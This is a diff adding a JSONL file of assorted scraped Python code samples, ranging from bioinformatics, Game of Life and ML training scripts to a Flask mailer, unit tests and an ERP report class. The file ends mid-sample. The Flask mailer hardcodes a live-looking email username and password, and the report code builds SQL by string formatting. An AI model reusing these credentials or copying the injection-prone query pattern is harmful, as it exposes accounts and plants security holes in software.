diff --git "a/1162.jsonl" "b/1162.jsonl" new file mode 100644--- /dev/null +++ "b/1162.jsonl" @@ -0,0 +1,621 @@ +{"seq_id":"636414414","text":"import os\nimport sys\nfrom Bio.Seq import reverse_complement\n\nmyfasta = open(sys.argv[1], 'r')\n\nfastadict = dict()\n\nfor line in myfasta:\n\tif \">\" in line:\n\t\tfastadict[line.strip().split(' ')[0][1:]] = next(myfasta).strip()\n\n\nmyblast = open(sys.argv[2], 'r')\n\nalreadyseen = []\n\nout = open(sys.argv[3], 'w')\nblastgood = open(sys.argv[4], 'w')\nblastfail = open(sys.argv[5], 'w')\n\nfor line in myblast:\n\tinfo = line.strip().split('\\t')\n\tif info[0] in alreadyseen:\n\t\tcontinue\n\telse:\n\t\tif int(info[8]) > int(info[9]):\n\t\t\toutseq = reverse_complement(fastadict[info[0]])\n\t\t\tstart = int(info[9]) - 1\n\t\t\tend = int(info[8])\n\t\telse:\n\t\t\toutseq = fastadict[info[0]]\n\t\t\tstart = int(info[8]) - 1\n\t\t\tend = int(info[9])\n\n\t\texonstart = int(info[1].split('|')[-2])\n\t\texonend = int(info[1].split('|')[-1])\n\n\t\tif start <= exonstart and end >= exonend:\n\t\t\tout.write('>' + info[0] + '\\n')\n\t\t\tout.write(outseq + '\\n')\n\t\t\tblastgood.write(line)\n\t\telse:\n\t\t\tblastfail.write(line)\n\n\t\talreadyseen.append(info[0])\n\n\t","sub_path":"6blasting/make_final_files.py","file_name":"make_final_files.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"545927854","text":"\"\"\" Conway game of life \"\"\"\nimport random, time, copy\nWIDTH = 60\nHEIGHT = 20\n\n# Create a list of list for the cells: \nnextCells = []\nfor x in range(WIDTH):\n column = [] # Create new column\n for y in range(HEIGHT):\n if (random.randint(0,1) == 0): #Returns an integer equal or higher than 0 and lower or equal to 1\n column.append('#') # Add a living cell if random int is 0\n else:\n column.append(' ')\n nextCells.append(column) # Nextcells is a list of columns\n\n# Main program loop:\nwhile True:\n print('\\n\\n\\n\\n\\n') # Print 5 new lines\n currentCells = copy.deepcopy(nextCells) # Create new reference to cells\n\n # Print current cells on the screen\n for y in range(HEIGHT):\n for x in range(WIDTH):\n print(currentCells[x][y], end='') #Print the # or space\n print()\n\n # Calculate the next step's cell based on current step's cells:\n for x in range(WIDTH):\n for y in range(HEIGHT):\n # Get neighboring coordinates \n # '% WIDTH' ensures leftCoor is always between 0 and width -1 \n\n leftCoord = (x - 1) % WIDTH # If -1, evaluates to 59\n rightCoord = (x + 1) % WIDTH\n aboveCoord = (y - 1) % HEIGHT\n belowCoord = (y + 1) % HEIGHT\n\n # Count number of living neighbords:\n numNeighbors = 0\n if (currentCells[leftCoord][aboveCoord] == '#'):\n numNeighbors += 1 # Top left neighbor is alive\n if (currentCells[x][aboveCoord] == '#'):\n numNeighbors += 1 # Top neighbor is alive\n if (currentCells[rightCoord][aboveCoord] == '#'):\n numNeighbors += 1 # Top right neighbor is alive\n if (currentCells[leftCoord][y] == '#'):\n numNeighbors += 1 # Left neighbor is alive\n if (currentCells[rightCoord][y] == '#'):\n numNeighbors += 1 # Right neighbor is alive\n if (currentCells[leftCoord][belowCoord] == '#'):\n numNeighbors += 1 # Below left neighbor is alive\n if (currentCells[x][belowCoord] == '#'):\n numNeighbors += 1 # Below neighbor is alive\n if (currentCells[rightCoord][belowCoord] == '#'):\n numNeighbors += 1 # Below right neighbor is alive\n \n if (currentCells[x][y] == '#' and (numNeighbors == 2 or numNeighbors == 3)):\n 
nextCells[x][y] = '#' # Living cells with 2 or 3 neighbors stay alive\n            elif (currentCells[x][y] == ' ' and numNeighbors == 3):\n                nextCells[x][y] = '#' # Dead cells with 3 neighbors become alive\n            else:\n                nextCells[x][y] = ' ' # All others become or stay dead\n\n    time.sleep(1) # Set a 1 second pause to reduce flickering\n","sub_path":"chapter4/conwayGameOfLife.py","file_name":"conwayGameOfLife.py","file_ext":"py","file_size_in_byte":2806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"571233201","text":"\ndef load_input_array(input_path):\n    input_arr = []\n    with open(input_path) as f:\n        input_arr = list(map(lambda char: int(char), f.read().split(',')))\n    return input_arr\n\ninput = load_input_array('input.txt')\n\ndef guess_inputs(original_input):\n    target = 19690720\n    for noun in range(0,100):\n        for verb in range(0,100):\n            arr = original_input[:]\n            arr[1] = noun\n            arr[2] = verb\n            i = 0\n            while arr[i] != 99:\n                if arr[i] == 1:\n                    arr[arr[i+3]] = arr[arr[i+1]] + arr[arr[i+2]]\n                else:\n                    arr[arr[i+3]] = arr[arr[i+1]] * arr[arr[i+2]]\n                i += 4\n            if arr[0] == target:\n                return (noun, verb)\n\nprint(guess_inputs(input))\n","sub_path":"2/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"639843242","text":"\"\"\"\nExplore color space and distances.\n\nVersion: 2015may13\n\"\"\"\n\nfrom pylab import * # analysis:ignore\nfrom mpl_toolkits.mplot3d import Axes3D # analysis:ignore\nfrom copy import deepcopy\n\nnpts = 20\nstep = 0.02\nlowerlim = 0\nupperlim = 1\nstart = [0.5, 0.5, 0.5]\neps = 0.01\nmaxsteps = 2000\nndims = 3\nplotevery = 100\n\n\nfig = figure()\nax = fig.add_subplot(111, projection='3d')\ndef plotpoints(points,label):\n    ax.cla()\n    ax.scatter(points[:,0], points[:,1], points[:,2], c=points, s=200, depthshade=False)\n    ax.set_title(label)\n    ax.set_xlabel('R')\n    ax.set_ylabel('G')\n    ax.set_zlabel('B')\n    ax.set_xlim((0,1))\n    ax.set_ylim((0,1))\n    ax.set_zlim((0,1))\n\ndef metric1(points):\n    \"\"\" Maximize sum of pairwise distances \"\"\"\n    npts = len(points)\n    dist = 0\n    for p1 in range(npts):\n        for p2 in range(npts):\n            dist += norm(points[p2]-points[p1])\n    return dist\n\ndef metric2(points):\n    \"\"\" Maximize minimum distance between 2 points \"\"\"\n    npts = len(points)\n    totaldist = 0\n    for p1 in range(npts):\n        thisdist = inf\n        for p2 in range(npts):\n            if p1!=p2:\n                thisdist = minimum(thisdist, norm(points[p2]-points[p1]))\n        totaldist += thisdist\n    return totaldist\n\npoints = []\nfor p in range(npts):\n    points.append(start+eps*(randn(ndims)))\npoints = array(points)\n\n\nfor s in range(maxsteps+1):\n    orig = deepcopy(points)\n    for dim in range(ndims):\n        pert = step*(randn(npts))\n        points[:,dim] += pert\n        points[points[:,dim]<lowerlim,dim] = orig[points[:,dim]<lowerlim,dim] # Reset points that went too low\n        points[points[:,dim]>upperlim,dim] = orig[points[:,dim]>upperlim,dim] # Reset points that went too high\n    dorig = metric2(orig)\n    dnew = metric2(points)\n\n    label = 'Step: %i | Original: %0.3f | New: %0.3f' % (s, dorig, dnew)\n    print(label)\n    if dnew < dorig: points = orig # If the new layout scores worse, revert to the original points\n    if not(s % plotevery):\n        plotpoints(points, label)\n        pause(0.05)\n\n\nprint('Done.')","sub_path":"general/colorspace.py","file_name":"colorspace.py","file_ext":"py","file_size_in_byte":2039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"297667267","text":"# -*- coding: utf-8 -*-\n\nfrom flask import Flask, render_template\nfrom flask_mail import Mail,
Message\nfrom threading import Thread\nimport os\nfrom blog2 import app\n\napp.config['MAIL_SERVER'] = 'smtp-mail.outlook.com' # mail server address\napp.config['MAIL_PORT'] = 587 # mail server port\napp.config['MAIL_USE_TLS'] = True # enable TLS\napp.config['MAIL_USERNAME'] = 'flasktest@outlook.com'\napp.config['MAIL_PASSWORD'] = 'flask2014'\n#app.config['SECURITY_EMAIL_SENDER'] = 'flasktest@outlook.com'\n\nmail = Mail(app)\n\ndef send_async_email(app, msg):\n    with app.app_context():\n        mail.send(msg)\n\n\ndef send_email(mailcon,content):\n    msgcon='<p>Found that the user with ID '+str(content.userid)+', '+str(content.username)+', posted a new comment containing high-risk sensitive words:</p>'\n    for i in mailcon:\n        msgcon+='<table>'\n        msgcon+='<tr><th>Keyword</th><th>Occurrences</th></tr><tr><td>'+str(i['key'])+'</td><td>'+str(i['times'])+' times</td></tr></table><p>Please confirm and handle this in the backend management system.</p>'\n    msg = Message('Warning: keywords', sender=('ethan', 'flasktest@outlook.com'), recipients=['j.krma@hotmail.com'])\n    msg.html = msgcon\n    thr = Thread(target=send_async_email, args=[app, msg])\n    thr.start()\n    return 'send successfully'\n'''\n# The most basic way to send mail\n@app.route('/')\ndef index():\n    msg = Message('Hello', sender=('ethan', 'flasktest@outlook.com'), recipients=['j.krma@hotmail.com'])\n    # msg.body = 'The first email!'\n    msg.html = 'Hello Web'\n    mail.send(msg)\n\n    return '<h1>OK!</h1>'\n'''\n'''\n# Send mail asynchronously\n@app.route('/sync')\ndef send_email():\n    msg = Message('Hello', sender=('ethan', 'flasktest@outlook.com'), recipients=['j.krma@hotmail.com'])\n    msg.html = 'send email asynchronously'\n    thr = Thread(target=send_async_email, args=[app, msg])\n    thr.start()\n    return 'send successfully'\n\n\n# Mail with an attachment\n@app.route('/attach')\ndef add_attchments():\n    msg = Message('Hello', sender=('ethan', 'flasktest@outlook.com'), recipients=['j.krma@hotmail.com'])\n    msg.html = 'Hello Web'\n\n    with app.open_resource(\"/Users/ethan/Documents/pixels.jpg\") as fp:\n        msg.attach(\"photo.jpg\", \"image/jpeg\", fp.read())\n\n    mail.send(msg)\n    return '<h1>OK!</h1>
'\n\n\nif __name__ == '__main__':\n app.run(host='127.0.0.1', debug=True)\n '''","sub_path":"CheSongze/Task3/1-3/blog2/controller/mail.py","file_name":"mail.py","file_ext":"py","file_size_in_byte":2452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"363879759","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# Copyright (c) 2021, Dialobot. All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport torch.nn.functional as F\nimport torch\nfrom pytorch_lightning.callbacks.early_stopping import EarlyStopping\nfrom transformers import get_cosine_schedule_with_warmup\nfrom torch.optim.lr_scheduler import LambdaLR\nfrom torch.optim import Optimizer, AdamW\nfrom torch.utils.data import DataLoader\nfrom typing import Dict, Tuple, List\nfrom transformers import MBartForConditionalGeneration, MBart50TokenizerFast\nimport pytorch_lightning as pl\nimport sys\nfrom pytorch_lightning.callbacks import ModelCheckpoint\n\n\nclass BartForSeq2SeqLM(pl.LightningModule):\n def __init__(self, src_lang, tgt_lang):\n super().__init__()\n self.batch_size = 16\n self.lr = 3e-5\n self.src_lang = src_lang\n self.tgt_lang = tgt_lang\n self.model = MBartForConditionalGeneration.from_pretrained(\n \"facebook/mbart-large-en-ro\"\n )\n\n def forward(self, batch):\n model_inputs, labels = batch\n out = self.model(**model_inputs, labels=labels)\n return out\n\n def training_step(self, batch, batch_idx):\n \"\"\"Training steps\"\"\"\n out = self.forward(batch)\n loss = out[\"loss\"]\n self.log(\"train_loss\", loss)\n return loss\n\n @torch.no_grad()\n def validation_step(self, batch, batch_idx) -> Dict:\n \"\"\"Validation steps\"\"\"\n out = self.forward(batch)\n loss = out[\"loss\"]\n self.log('val_loss', loss, on_step=True, prog_bar=True, logger=True)\n return loss\n\n def test_step(self, batch, batch_idx):\n while True:\n user_input = input()\n\n if user_input == \"stop\":\n break\n else:\n inputs = self.tokenizer(user_input, return_tensors=\"pt\")\n translated_tokens = model.generate(\n **inputs,\n decoder_start_token_id=self.tokenizer.lang_code_to_id[self.tgt_lang]\n )\n print(\n self.tokenizer.batch_decode(\n translated_tokens, skip_special_tokens=True\n )[0]\n )\n\n def configure_optimizers(self) -> Tuple[List[Optimizer], List[LambdaLR]]:\n \"\"\"\n Configure optimizers and lr schedulers\n\n Returns:\n (Tuple[List[Optimizer], List[LambdaLR]]): [optimizers], [schedulers]\n \"\"\"\n\n optimizer = AdamW([p for p in self.parameters() if p.requires_grad], lr=self.lr)\n\n return {\"optimizer\": optimizer}\n\n def train_dataloader(self):\n return DataLoader(\n PAWS_X(\"x-final/ko/translated_train.tsv\", \"ko_KR\", \"ko_KR\", 128),\n batch_size=4,\n pin_memory=True,\n num_workers=4,\n shuffle=True,\n )\n\n def val_dataloader(self):\n return DataLoader(\n PAWS_X(\"x-final/ko/dev_2k.tsv\", \"ko_KR\", \"ko_KR\", 128),\n num_workers=4,\n batch_size=4,\n pin_memory=True,\n )\n\n\nif __name__ == \"__main__\":\n # trainer = pl.Trainer(gpus=None)\n 
trainer = pl.Trainer(\n gpus=1,\n callbacks=[\n EarlyStopping(monitor=\"val_loss\"),\n ModelCheckpoint(\n monitor=\"val_loss\",\n filename=\"paraphrase_mbart_{epoch:02d}-{val_loss:.2f}\",\n save_top_k=1,\n mode=\"min\",\n ),\n ]\n )\n model = BartForSeq2SeqLM(\"ko_KR\", \"ko_KR\")\n trainer.fit(model)\n","sub_path":"gym/models/bart/clone.py","file_name":"clone.py","file_ext":"py","file_size_in_byte":4063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"16306456","text":"from lru_cache import Node, LRUCache\nimport unittest\n\n\nclass TestNode(unittest.TestCase):\n def test_instantiates(self):\n \"\"\"\n Instantiates a new version of Node\n \"\"\"\n node = Node()\n self.assertIsInstance(node, Node)\n\n def test_instantiates_with_default_none(self):\n \"\"\"\n Instantiates with None as default value\n \"\"\"\n node = Node()\n result = node._value\n self.assertEqual(result, None)\n\n def test_get_value_returns_default_none(self):\n \"\"\"\n Returns None if no value has been assigned yet\n \"\"\"\n node = Node()\n result = node.get_value()\n self.assertEqual(result, None)\n\n def test_returns_value_of_node(self):\n \"\"\"\n Returns the value of the node that has been assigned\n \"\"\"\n node = Node(\"test\")\n result = node.get_value()\n self.assertEqual(result, \"test\")\n\n def test_delete_returns_value(self):\n \"\"\"\n Returns the value of the deleted node\n \"\"\"\n node = Node(\"test\")\n result = node.delete()\n self.assertEqual(result, \"test\")\n\n def test_delete_removes_previous_next_ref(self):\n \"\"\"\n Removes the reference to the previous and next nodes\n when deleted\n \"\"\"\n node = Node(\"test\")\n node._next = Node(\"next\")\n node._previous = Node(\"previous\")\n node.delete()\n self.assertEqual(node._next, None)\n self.assertEqual(node._previous, None)\n\n def test_sets_previous_and_next_node_to_each_other(self):\n \"\"\"\n Sets the previous and next node's references to each other\n \"\"\"\n node = Node(\"middle\")\n next = Node(\"next\")\n previous = Node(\"previous\")\n node._next = next\n node._previous = previous\n node.delete()\n self.assertEqual(next._previous, previous)\n self.assertEqual(previous._next, next)\n\n\nclass TestLRUCache(unittest.TestCase):\n def test_instantiates(self):\n \"\"\"\n Instantiates a new version of LRUCache\n \"\"\"\n cache = LRUCache()\n self.assertIsInstance(cache, LRUCache)\n\n def test_records_max_size(self):\n \"\"\"\n Records the correct max size of the cache\n \"\"\"\n cache = LRUCache(10)\n result = cache._max_size\n self.assertEqual(result, 10)\n\n def test_instantiates_with_none_as_default(self):\n \"\"\"\n Instantiates with null as default initial values\n for front and back\n \"\"\"\n cache = LRUCache(100)\n front_value = cache._front\n back_value = cache._back\n self.assertEqual(front_value, None)\n self.assertEqual(back_value, None)\n\n def test_instantiates_with_initial_value(self):\n \"\"\"\n Instantiates with an initial value if a second\n argument is given\n \"\"\"\n cache = LRUCache(10, \"test\")\n front_value = cache._front.get_value()\n back_value = cache._back.get_value()\n self.assertEqual(front_value, \"test\")\n self.assertEqual(back_value, \"test\")\n\n def test_length_returns_0(self):\n \"\"\"\n Returns 0 if no values have been added\n \"\"\"\n cache = LRUCache(10)\n result = cache.length()\n self.assertEqual(result, 0)\n\n def test_returns_correct_length(self):\n \"\"\"\n Returns the correct length of the cache if\n values have been added\n \"\"\"\n cache 
= LRUCache(1234)\n cache.add_value(\"1\")\n cache.add_value(\"2\")\n cache.add_value(\"3\")\n result = cache.length()\n self.assertEqual(result, 3)\n\n def test_adds_value_to_front_of_cache(self):\n \"\"\"\n Adds a new value to the front of the cache\n \"\"\"\n cache = LRUCache(100)\n cache.add_value(1)\n cache.add_value(2)\n front_value = cache._front.get_value()\n back_value = cache._back.get_value()\n self.assertEqual(front_value, 2)\n self.assertEqual(back_value, 1)\n\n def test_removes_value_at_back_of_cache(self):\n \"\"\"\n Removes a value at the back of the cache if the max\n size has been reached\n \"\"\"\n cache = LRUCache(5)\n for i in range(0, 6):\n cache.add_value(i)\n result = cache._back.get_value()\n self.assertEqual(result, 1)\n\n def test_accesses_value_and_moves_to_front(self):\n \"\"\"\n Moves a value to the front of the cache if it's\n accessed\n \"\"\"\n cache = LRUCache(10, \"first\")\n cache.add_value(\"second\")\n cache.add_value(\"third\")\n cache.access_value(\"first\")\n front_value = cache._front.get_value()\n back_value = cache._back.get_value()\n self.assertEqual(front_value, \"first\")\n self.assertEqual(back_value, \"second\")\n\n def test_returns_true_if_value_found(self):\n \"\"\"\n Returns True if the value is found in the cache\n \"\"\"\n cache = LRUCache(100)\n cache.add_value(\"test\")\n result = cache.access_value(\"test\")\n self.assertEqual(result, True)\n\n def test_returns_false_if_value_not_found(self):\n \"\"\"\n Returns False if the value is not found in the\n cache\n \"\"\"\n cache = LRUCache(100)\n cache.add_value(\"test\")\n result = cache.access_value(\"this value cannot be found\")\n self.assertEqual(result, False)\n\n def test_delete_sets_front_and_back_to_none(self):\n \"\"\"\n Sets front and back references to None\n \"\"\"\n cache = LRUCache(100)\n cache.add_value(1)\n cache.delete_value(1)\n front_value = cache._front\n back_value = cache._back\n self.assertEqual(front_value, None)\n self.assertEqual(back_value, None)\n\n def test_returns_true_if_deleted(self):\n \"\"\"\n Returns True if the value has been deleted\n from the cache\n \"\"\"\n cache = LRUCache(100)\n cache.add_value(1)\n result = cache.delete_value(1)\n self.assertEqual(result, True)\n\n def test_returns_false_if_not_deleted(self):\n \"\"\"\n Returns False if the value is not deleted\n or cannot be found in the cache\n \"\"\"\n cache = LRUCache(10)\n result = cache.delete_value(1)\n self.assertEqual(result, False)\n\n def test_delete_updates_length(self):\n \"\"\"\n Updates the correct length of the cache\n \"\"\"\n cache = LRUCache(10)\n cache.add_value(1)\n before_delete = cache.length()\n cache.delete_value(1)\n after_delete = cache.length()\n self.assertEqual(before_delete, 1)\n self.assertEqual(after_delete, 0)\n\n def test_sets_new_back_correctly(self):\n \"\"\"\n Sets the new back of the cache correctly\n when deleting the back value\n \"\"\"\n cache = LRUCache(10)\n cache.add_value(1)\n cache.add_value(2)\n cache.add_value(3)\n cache.delete_value(1)\n result = cache._back.get_value()\n self.assertEqual(result, 2)\n\n def test_sets_new_front_correctly(self):\n \"\"\"\n Sets the new front of the cache correctly\n when deleting the front value\n \"\"\"\n cache = LRUCache(10)\n cache.add_value(1)\n cache.add_value(2)\n cache.add_value(3)\n cache.delete_value(3)\n result = cache._front.get_value()\n self.assertEqual(result, 2)\n\n\nif __name__ == \"__main__\":\n 
unittest.main()\n","sub_path":"data_structures/cache/least_recently_used/test_lru_cache.py","file_name":"test_lru_cache.py","file_ext":"py","file_size_in_byte":7500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"554195315","text":"from BeautifulSoup import BeautifulSoup, Tag\n\nNEWLINE_TAGS = ['div', 'p'] #'br', \n\n\ndef replace_tags(soup, name, replace):\n for t in soup(name):\n t.replaceWith(replace)\n \n return soup\n\n\n\ndef flatten(soup):\n \n if not hasattr(soup, 'contents'):\n return unicode(soup) \n \n text = u\"\"\n \n for child in soup.contents:\n if isinstance(child, Tag) and child.name in NEWLINE_TAGS:\n text += \"\\n\"\n text += flatten(child)\n\n return text","sub_path":"utils/soupmagic.py","file_name":"soupmagic.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"418156669","text":"\"\"\"\nExample of MPQ agent, dumping data into yaml file, with the environment DeepSeaTreasureRightDownStochastic, specific\nprecision and binary dumps.\n\"\"\"\nimport time\n\nimport yaml\n\nimport utils.miscellaneous as um\nimport utils.models as u_models\nfrom agents import AgentMPQ\nfrom configurations.paths import dumps_path\nfrom environments import Environment, DeepSeaTreasureRightDownStochastic\nfrom models import GraphType, Vector\n\n\ndef dumps(data: dict, columns: int, environment: Environment):\n \"\"\"\n Dumps full_data given into dumps directory\n :param environment:\n :param columns:\n :param data:\n :return:\n \"\"\"\n\n timestamp = int(time.time())\n\n # Get environment name in snake case\n environment = um.str_to_snake_case(environment.__class__.__name__)\n\n # Get only first letter of each word\n env_name_abbr = ''.join([word[0] for word in environment.split('_')])\n\n # Specify full path\n file_path = dumps_path.joinpath(\n 'mpq/train_data/{}_{}_{}_{}.yml'.format(env_name_abbr, timestamp, Vector.decimal_precision, columns)\n )\n\n # If any parents doesn't exist, make it.\n file_path.parent.mkdir(parents=True, exist_ok=True)\n\n with file_path.open(mode='w+', encoding='UTF-8') as f:\n f.write(um.structures_to_yaml(data=data))\n\n\ndef train_from_zero():\n # Define variables\n limit = 500\n epsilon = 0.4\n max_steps = 1000\n alpha = 0.1\n gamma = 1\n graph_type = GraphType.EPISODES\n columns_list = range(1, 4)\n decimals = [0.01, 0.05]\n\n for decimal_precision in decimals:\n\n # Set vector decimal precision\n Vector.set_decimal_precision(decimal_precision=decimal_precision)\n\n for columns in columns_list:\n # Environment\n environment = DeepSeaTreasureRightDownStochastic(columns=columns)\n\n # Create agent\n agent = AgentMPQ(environment=environment, hv_reference=environment.hv_reference, epsilon=epsilon,\n alpha=alpha, gamma=gamma, max_steps=max_steps)\n\n # Time train\n t0 = time.time()\n\n # Show numbers of columns\n print('# of columns: {}'.format(columns))\n\n # Agent training\n agent.train(graph_type=graph_type, limit=limit)\n\n # Calc total time\n total_time = time.time() - t0\n\n prepare_for_dumps(agent, columns, decimal_precision, graph_type, limit, total_time)\n\n\ndef prepare_for_dumps(agent, columns, decimal_precision, graph_type, limit, total_time):\n # Convert to vectors\n vectors = {key: [v.tolist() for v in vectors.values()] for key, vectors in agent.v.items()}\n\n # Prepare full_data to dumps\n data = {\n 'time': total_time,\n 'memory': {\n 'v_s_0': len(agent.v[agent.environment.initial_state]),\n 'full': 
sum(len(vectors) for vectors in agent.v.values())\n },\n 'vectors': vectors\n }\n\n # Configuration of environment\n environment_info = vars(agent.environment).copy()\n environment_info.pop('_action_space', None)\n environment_info.pop('np_random', None)\n environment_info.update({'columns': columns})\n\n # Configuration of agent\n agent_info = {\n 'alpha': agent.alpha,\n 'gamma': agent.gamma,\n 'epsilon': agent.epsilon,\n 'evaluation_mechanism': str(agent.evaluation_mechanism),\n 'initial_q_value': agent.initial_q_value,\n 'initial_seed': agent.initial_seed,\n 'interval_to_get_data': agent.interval_to_get_data,\n 'max_steps': agent.max_steps,\n 'total_steps': agent.total_steps,\n 'total_episodes': agent.total_episodes,\n 'decimal_precision': decimal_precision,\n 'hv_reference': agent.hv_reference,\n }\n\n training_info = {\n 'graph_type': str(graph_type),\n 'limit': limit\n }\n\n # Extra data\n data.update({'environment': environment_info})\n data.update({'agent': agent_info})\n data.update({'training': training_info})\n\n # Dumps partial execution\n dumps(data=data, columns=columns, environment=agent.environment)\n\n # Dumps model\n agent.save()\n\n\ndef train_from_file():\n # Information files (Specify a existing binary file of this configurations, in my case is are these)\n models_path = 'mpq/models/dstrds_1579869395_1.0_4.bin'\n config_path = 'mpq/train_data/dstrds_1579869395_1.0_4.yml'\n\n agent: AgentMPQ = u_models.binary_load(path=dumps_path.joinpath(\n models_path\n ))\n\n # Data Path\n data_path = dumps_path.joinpath(config_path)\n data_file = data_path.open(mode='r', encoding='UTF-8')\n\n # Load yaml from file\n data = yaml.load(data_file, Loader=yaml.FullLoader)\n\n # Extract relevant data for training\n before_training_execution = float(data['time'])\n decimal_precision = float(data['agent']['decimal_precision'])\n graph_type = GraphType.from_string(data['training']['graph_type'])\n limit = int(data['training']['limit'])\n columns = int(data['environment']['columns'])\n\n # Set decimal precision\n Vector.set_decimal_precision(decimal_precision=decimal_precision)\n\n # Time train\n t0 = time.time()\n\n # Agent training\n agent.train(graph_type=graph_type, limit=limit)\n\n # Calc total time\n total_time = (time.time() - t0) + before_training_execution\n\n prepare_for_dumps(agent, columns, decimal_precision, graph_type, limit, total_time)\n\n\nif __name__ == '__main__':\n train_from_zero()\n # train_from_file()\n","sub_path":"extras/draft_mpq.py","file_name":"draft_mpq.py","file_ext":"py","file_size_in_byte":5459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"547525969","text":"#encoding: utf-8\nfrom OpenOrange import *\nfrom Report import Report\nfrom Label import Label\n\ndef GetItemLabelsTotals(LabelType,FromDate,ToDate):\n Table = {}\n salesq = \"SELECT {ArtCode}, sum({RowTotal}) AS Sales \" \n salesq += \"FROM [InvoiceItemRow] \"\n salesq += \"INNER JOIN [Invoice] ON [Invoice].{internalId} = [InvoiceItemRow].{masterId} \"\n salesq += \"WHERE?AND {TransDate} BETWEEN d|%s| AND d|%s| \" % (FromDate,ToDate) \n salesq += \"GROUP BY {ArtCode} \"\n\n labelq = \"SELECT il.{Value} as Label, i.{Code} \\n\"\n labelq += \"FROM [Label] lab \\n\"\n labelq += \"RIGHT JOIN [ItemLabels] il ON lab.{Code}=il.{Value} \\n\" \n labelq += \"LEFT JOIN [Item] i ON i.{internalId}=il.{masterId} \\n\" \n labelq += \"WHERE?AND lab.{Type}=s|%s| \" % LabelType\n\n query = Query()\n query.sql = \"SELECT t1.{Label}, SUM(t2.{Sales}) AS Total\\n\"\n 
query.sql += \"FROM (%s) t1 \\n\" % (labelq)\n query.sql += \"LEFT JOIN (%s) t2 ON t2.{ArtCode}=t1.Code\\n\" % salesq\n query.sql += \"GROUP BY t1.{Label}\\n \"\n Table = {}\n if(query.open()):\n message(\"it opens\" + str(query.count()))\n for r in query:\n if r.Total and r.Label:\n Table[r.Code] = r.Sales\n query.close()\n return Table\n\n\nclass ItemTree(Report):\n\n def defaults(self):\n Report.defaults(self)\n specs = self.getRecord()\n specs.startnode = \"TODO\"\n \n def PrintAtLevel(self,Node,level,first):\n if not first:\n self.startRow()\n for i in range(1,level+1):\n self.addValue(\"\")\n self.addValue(Node,CallMethod=\"ZoomIn\", Parameter = Node)\n #self.addValue(\"%s
(%7.0f)\" % (Node,self.Table.get(Node,0)))\n\n def TreeWalk(self,tree,Node,level):\n if tree.has_key(Node):\n firstson = True\n for child in tree[Node]:\n self.PrintAtLevel(child[0],level+1,firstson)\n self.TreeWalk(tree,child[0],level+1)\n firstson = False\n else:\n self.endRow()\n \n def run(self):\n specs = self.getRecord()\n self.printReportTitle(\"Item Tree\")\n if (not self.__dict__.has_key(\"selectedLabel\")):\n self.selectedLabel = None\n if specs.Label:\n self.ItemList(specs.Label,specs.ShowInverse)\n return\n \n self.startTable()\n self.headerA(\"Nivel\")\n self.header(\"0\",\"1\",\"2\",\"3\",\"4\")\n tree = {}\n self.Table = {} #GetItemLabelsTotals(specs.LabelType,specs.FromDate,specs.ToDate)\n query = Query()\n query.sql = \"SELECT {Code},{Name},{Level},{PathToRoot} from [Classification] \\n\" # LO: This is not Label anymore !!! \n query.sql += \"ORDER BY {PathToRoot},{Code} \\n\"\n if(query.open()):\n for r in query:\n if not tree.has_key(r.PathToRoot):\n tree[r.PathToRoot] = []\n tree[r.PathToRoot].append((r.Code,r.Name,r.Level))\n query.close()\n self.startRow()\n self.PrintAtLevel(specs.startnode,0,True)\n self.TreeWalk(tree,specs.startnode,0)\n self.endTable()\n self.startTable()\n self.startRow()\n self.addValue(tr(\"Show Classification Errors\"),CallMethod=\"showNotLabeled\", Parameter = specs.startnode)\n self.endRow()\n self.endTable()\n \n def showNotLabeled(self,param,value):\n specs = self.getRecord()\n report = ItemTree()\n report.defaults()\n report.getRecord().Label = specs.startnode\n report.getRecord().ShowInverse = 1\n report.open(False)\n\n def ZoomIn(self,param,value):\n specs = self.getRecord()\n report = ItemTree()\n report.defaults()\n report.getRecord().Label = param\n report.getRecord().ShowInverse = 0\n report.open(False)\n\n def selectLabel(self,param,value):\n self.clear()\n self.selectedLabel = param\n self.run()\n self.render()\n\n def selectArticle(self,param,value):\n self.clear()\n from Item import Item\n it = Item.bring(param)\n if it:\n it.Labels = self.selectedLabel\n it.store()\n self.run()\n self.render()\n\n\n def printLabelOptions(self,LabelSet):\n self.startTable()\n self.header(\"Label\",\"Name\")\n for lab in LabelSet:\n if (not self.selectedLabel): \n self.selectedLabel = lab\n self.startRow()\n if (self.selectedLabel==lab): \n col = self.LevelCBackColor\n else:\n col = self.LevelABackColor\n self.addValue(lab,CallMethod=\"selectLabel\",Parameter = lab,Color = col)\n self.addValue(\"\")\n self.endRow()\n self.row()\n self.endTable()\n\n\n def ItemList(self,Node,Inverse):\n labset = Label.getTreeLeaves(Node)\n if Inverse:\n self.printLabelOptions(labset)\n import string\n query = Query()\n query.sql = \"SELECT Code AS ArtCode, Name AS ArtName,Classification,Price \"\n query.sql += \"FROM [Item] \"\n if Inverse:\n query.sql += \"WHERE?AND Classification NOT IN ('%s') \" % \"','\".join(labset)\n else: \n query.sql += \"WHERE?AND Classification IN ('%s') \" % \"','\".join(labset)\n 